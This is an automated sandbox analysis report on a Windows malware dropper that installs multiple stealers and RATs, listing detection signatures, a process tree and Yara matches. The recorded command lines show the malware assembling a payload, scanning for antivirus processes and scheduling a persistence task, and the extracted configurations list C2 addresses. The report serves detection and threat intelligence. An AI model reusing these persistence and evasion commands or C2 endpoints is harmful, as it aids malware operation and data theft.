Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519043
MD5:	cb1a17efda5be9d8d7ce9fe5903812da
SHA1:	d1b00bb0b02d27538eca9a2788f84e93cec9cf78
SHA256:	d558e3e2afe0bbfa36ae7020c052e1a0077c45e172d643e8f0af0aa617c35875
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Yara detected Amadeys stealer DLL

Yara detected Clipboard Hijacker

Yara detected CryptOne packer

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected Zhark RAT

Yara detected zgRAT

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Screensaver Binary File Creation

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CB1A17EFDA5BE9D8D7CE9FE5903812DA)

axplong.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: CB1A17EFDA5BE9D8D7CE9FE5903812DA)

axplong.exe (PID: 7876 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: CB1A17EFDA5BE9D8D7CE9FE5903812DA)

axplong.exe (PID: 6560 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: CB1A17EFDA5BE9D8D7CE9FE5903812DA)

gold.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe" MD5: 389881B424CF4D7EC66DE13F01C7232A)

conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1692 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

12dsvc.exe (PID: 2240 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe" MD5: 84263AB03B0A0F2B51CC11B93EC49C9F)

conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

weX3lQ8AOU.exe (PID: 3240 cmdline: "C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe" MD5: A3EF9920A91B891837705E46BB26DE17)

u3uP67496d.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Roaming\u3uP67496d.exe" MD5: 4E60F3FD76D9EAB244F9DC00F7765B0B)

Nework.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

Hkbsse.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

stealc_default2.exe (PID: 4512 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 7A02AA17200AEAC25A375F290A4B4C95)

needmoney.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe" MD5: 7FA5C660D124162C405984D14042506F)

svchost015.exe (PID: 3708 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)

penis.exe (PID: 4764 cmdline: "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe" MD5: 6760374F17416485FA941B354D3DD800)

conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

acentric.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe" MD5: 37D198AD751D31A71ACC9CB28ED0C64E)

2.exe (PID: 940 cmdline: "C:\Users\user\AppData\Local\Temp\1000285001\2.exe" MD5: B859D1252109669C1A82B235AAF40932)

conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 6412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

splwow64.exe (PID: 2044 cmdline: "C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe" MD5: 2B01C9B0C69F13DA5EE7889A4B17C45E)

cmd.exe (PID: 7316 cmdline: "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6332 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4940 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7368 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5360 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6152 cmdline: cmd /c md 607698 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 6520 cmdline: findstr /V "MaskBathroomCompositionInjection" Participants MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5960 cmdline: cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Waters.pif (PID: 8072 cmdline: Waters.pif Q MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 5756 cmdline: cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 6204 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

crypted.exe (PID: 5452 cmdline: "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe" MD5: FF5AFED0A8B802D74AF1C1422C720446)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

LummaC222222.exe (PID: 432 cmdline: "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe" MD5: 2F1D09F64218FFFE7243A8B44345B27E)

Hkbsse.exe (PID: 6900 cmdline: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

JavvvUmar.exe (PID: 7192 cmdline: "C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe" MD5: E17DD8E8ED9803018341037275960E16)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: StealC

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Threatname: LummaC

{"C2 url": ["gutterydhowi.shop", "stogeneratmns.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "reinforcenh.shop", "vozmeatillu.shop", "lootebarrkeyn.shop", "offensivedzvju.shop", "fragnantbui.shop"], "Build id": "FATE99--Mix"}

Threatname: Vidar

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: Cryptbot

{"C2 list": ["sevtvf17vt.top", "analforeverlovyu.top", "vt.top", ".top", "@sevtvf17vt.top"]}

Threatname: Zhark RAT

{"C2 url": "https://solutionhub.cc:443/socket/", "Id": "5A90D63E0E4DDF045D88A0B893E4499EB6814BDA077145A36EC98B433E2DBDA1", "Version": "1CC68878051DC553418AD7"}

Threatname: RedLine

{"C2 url": "89.105.223.196:29862", "Bot Id": "ERROR RDX", "Authorization Header": "21d3b2e8d7fdeff423c7a5819c5e64ed"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Roaming\u3uP67496d.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x57b79:$s1: file:/// 0x57ab1:$s2: {11111-22222-10009-11112} 0x57b09:$s3: {11111-22222-50001-00000} 0x54634:$s4: get_Module 0x4e1cf:$s5: Reverse 0x4f0f2:$s6: BlockCopy 0x4e1ff:$s7: ReadByte 0x57b8b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x57b79:$s1: file:/// 0x57ab1:$s2: {11111-22222-10009-11112} 0x57b09:$s3: {11111-22222-50001-00000} 0x54634:$s4: get_Module 0x4e1cf:$s5: Reverse 0x4f0f2:$s6: BlockCopy 0x4e1ff:$s7: ReadByte 0x57b8b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 13 entries

Memory Dumps

Source	Rule	Description	Author
00000012.00000000.2055908255.00000000009B2000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1448950419.0000000000211000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.2248416427.0000000003159000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ZharkRAT	Yara detected Zhark RAT	Joe Security
00000026.00000002.2581111095.0000000000423000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000024.00000002.2377213784.0000000003B95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.2010973024.00000000041F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000003.1394024866.0000000004980000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1408682891.0000000004A30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.2318326891.000000000088E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.1434414768.0000000000211000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ZharkRAT	Yara detected Zhark RAT	Joe Security
00000013.00000002.2078736142.0000000000611000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.2079003288.0000000000221000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000017.00000002.2261123132.0000000003740000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000002.3813401574.0000000000221000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.2186619176.0000000000421000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000000.2097350358.0000000000221000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.2323134391.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000013.00000000.2069470188.0000000000611000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1364464684.0000000005080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000000.2188308850.0000000000F42000.00000002.00000001.01000000.00000015.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000015.00000000.2088515827.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1404879841.0000000000871000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000002.2260770680.0000000003710000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ZharkRAT	Yara detected Zhark RAT	Joe Security
00000014.00000000.2076774547.0000000000221000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001C.00000003.3201366776.0000000003E85000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
00000009.00000003.1976285464.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000026.00000002.2587789310.000000000291A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.2272318909.000000000317C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: gold.exe PID: 1072	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1692	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1692	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2836	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: u3uP67496d.exe PID: 7600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u3uP67496d.exe PID: 7600	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 4512	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 4512	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 4512	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 4512	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: needmoney.exe PID: 7808	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: needmoney.exe PID: 7808	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: penis.exe PID: 4764	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: JavvvUmar.exe PID: 7192	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: JavvvUmar.exe PID: 7192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: JavvvUmar.exe PID: 7192	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: svchost015.exe PID: 3708	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: svchost015.exe PID: 3708	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 3708	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost015.exe PID: 3708	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: svchost015.exe PID: 3708	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 6412	JoeSecurity_ZharkRAT	Yara detected Zhark RAT	Joe Security
Process Memory Space: crypted.exe PID: 5452	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 60 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.2.needmoney.exe.312a4b9.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
10.2.gold.exe.41f5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.2.needmoney.exe.3710000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
16.2.RegAsm.exe.436080.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.crypted.exe.3b75570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.2.needmoney.exe.3740000.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
23.2.needmoney.exe.3710000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
21.0.stealc_default2.exe.ed0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
22.0.Hkbsse.exe.220000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
24.0.penis.exe.f40000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
24.0.penis.exe.f40000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
24.0.penis.exe.f40000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x57b79:$s1: file:/// 0x57ab1:$s2: {11111-22222-10009-11112} 0x57b09:$s3: {11111-22222-50001-00000} 0x54634:$s4: get_Module 0x4e1cf:$s5: Reverse 0x4f0f2:$s6: BlockCopy 0x4e1ff:$s7: ReadByte 0x57b8b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
21.2.stealc_default2.exe.ed0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
